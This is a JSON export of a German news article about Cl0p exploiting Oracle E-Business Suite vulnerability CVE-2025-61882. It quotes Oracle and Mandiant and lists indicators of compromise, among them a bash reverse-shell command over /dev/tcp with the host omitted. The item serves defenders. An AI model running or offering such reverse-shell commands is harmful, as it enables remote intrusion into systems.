{"id":5211,"date":"2025-10-06T16:52:14","date_gmt":"2025-10-06T16:52:14","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=5211"},"modified":"2025-10-06T16:52:14","modified_gmt":"2025-10-06T16:52:14","slug":"cl0p-nutzt-schwachstelle-bei-oracle-aus","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=5211","title":{"rendered":"Cl0p nutzt Schwachstelle bei Oracle aus"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<div class=\"extendedBlock-wrapper block-coreImage undefined\">\n<p>Die Cl0p-Bande nutzt Zero-Day-Schwachstelle bei Oracle f\u00fcr Cyberattacken aus.<\/p>\n<p class=\"imageCredit\">Dragos Asaftei \/ Shutterstock<\/p>\n<\/div>\n<p>Oracle hat ein Notfall-Update ver\u00f6ffentlicht, um eine kritische Sicherheitsl\u00fccke in seiner E-Business Suite (EBS) zu beheben. Das Leck mit Kennung <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-61882\">CVE-2025-61882<\/a> hat einen CVSS-Score von 9,8 und wurde bereits bei der j\u00fcngsten Welle von Cl0p zum Diebstahl von Daten ausgenutzt.<\/p>\n<p>Die Sicherheitsl\u00fccke betrifft einen nicht n\u00e4her bezeichneten Fehler, der es einem nicht authentifizierten Angreifer mit Netzwerkzugriff \u00fcber HTTP erm\u00f6glichen soll, die Oracle Concurrent-Processing-Komponente zu kompromittieren und so die Kontrolle zu \u00fcbernehmen.<\/p>\n<h2 class=\"wp-block-heading\">Zugriff aus der Ferne<\/h2>\n<p>\u201eDiese Sicherheitsl\u00fccke kann ohne Authentifizierung remote ausgenutzt werden, also \u00fcber ein Netzwerk, ohne Benutzername und Passwort\u201c, so <a href=\"https:\/\/www.oracle.com\/security-alerts\/alert-cve-2025-61882.html\">Oracle<\/a>. Bei erfolgreichem Exploit sei ein Angreifer dann in der Lage, \u00fcber die Sicherheitsl\u00fccke aus der Ferne b\u00f6sartigen Code ausf\u00fchren.<\/p>\n<p>Laut <a href=\"https:\/\/blogs.oracle.com\/security\/post\/apply-july-2025-cpu\">Rob Duhart<\/a>, Chief Security Officer von Oracle, sollten Unternehmen auf Indikatoren f\u00fcr eine Kompromittierung (IoCs) achten. Die folgenden IP-Adressen und Artefakte deuteten dabei auf eine m\u00f6gliche Beteiligung der Scattered LAPSUS$ Hunters-Gruppe an dem Exploit hin:<\/p>\n<p>200.107.207[.]26 (Potenzielle GET- und POST-Aktivit\u00e4t)<\/p>\n<p>185.181.60[.]11 (Potenzielle GET- und POST-Aktivit\u00e4t)<\/p>\n<p>sh -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/\/ 0&gt;&amp;1 (Herstellen einer ausgehenden TCP-Verbindung \u00fcber eine bestimmte port)<\/p>\n<p>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip<\/p>\n<p>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters\/exp.py<\/p>\n<p>oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters\/server.py<\/p>\n<h2 class=\"wp-block-heading\">Kompromittierung per Mail<\/h2>\n<p>Der Sicherheitsanbieter Mandiant beschreibt die Breaches als eine \u201emassive E-Mail-Kampagne\u201c, die von Hunderten kompromittierten Konten aus gestartet wurde. \u201eCl0p nutzte mehrere Schwachstellen in Oracle EBS aus und konnte so im August 2025 gro\u00dfe Datenmengen von mehreren Opfern stehlen\u201c, erkl\u00e4rte Charles Carmakal, CTO von Mandiant, in einem <a href=\"https:\/\/www.linkedin.com\/posts\/charlescarmakal_oracle-security-alert-advisory-cve-2025-activity-7380595612443893760-JNd_?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAADp8ucMBnHGa4_hjMDSxaOhqphT7OzdocQ0\">LinkedIn<\/a>-Post.<\/p>\n<p>Er f\u00fcgte hinzu, dass mehrere Schwachstellen ausgenutzt wurden, darunter \u201eSchwachstellen, die im Oracle-Update vom Juli 2025 gepatcht wurden, sowie eine, die an diesem Wochenende gepatcht wurde (CVE-2025-61882).\u201c<\/p>\n<p>Angesichts der bereits erfolgten, massenhaften Zero-Day-Ausnutzung (und der wahrscheinlich weiteren N-Day-Ausnutzung durch andere Akteure) sollten Unternehmen unabh\u00e4ngig vom Zeitpunkt der Patch-Anwendung pr\u00fcfen, ob sie bereits kompromittiert wurden\u201c, so Carmakal.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Die Cl0p-Bande nutzt Zero-Day-Schwachstelle bei Oracle f\u00fcr Cyberattacken aus. Dragos Asaftei \/ Shutterstock Oracle hat ein Notfall-Update ver\u00f6ffentlicht, um eine kritische Sicherheitsl\u00fccke in seiner E-Business Suite (EBS) zu beheben. Das Leck mit Kennung CVE-2025-61882 hat einen CVSS-Score von 9,8 und wurde bereits bei der j\u00fcngsten Welle von Cl0p zum Diebstahl von Daten ausgenutzt. Die Sicherheitsl\u00fccke [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":5212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-5211","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5211"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5211"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5211\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/5212"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}